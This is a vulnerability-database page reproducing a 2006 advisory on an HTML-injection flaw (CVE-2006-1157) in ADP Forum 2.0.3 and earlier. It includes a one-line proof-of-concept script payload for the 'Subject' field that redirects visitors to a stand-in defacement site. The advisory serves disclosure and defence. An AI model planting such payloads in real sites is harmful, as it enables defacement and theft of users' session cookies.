Recent Vulnerabilities Product List Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2006-1157

Publish Date: 09 Mar 2006

Author: liz0

                source: http://www.securityfocus.com/bid/17047/info

ADP Forum is prone to an HTML-injection vulnerability. The application fails to properly sanitize user-supplied input before using it in dynamically generated content. 

Attacker-supplied HTML and script code would be executed in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

This issue is reported to affect versions 2.0.3 and prior.

Subject :&lt;script&gt;location.href="http://evilsite.com/deface.html";&lt;/script&gt;

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Product List Vendor List Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

ADP Forum 2.0.x - 'Subject' HTML Injection

Vulmon Search

About

Products

Connect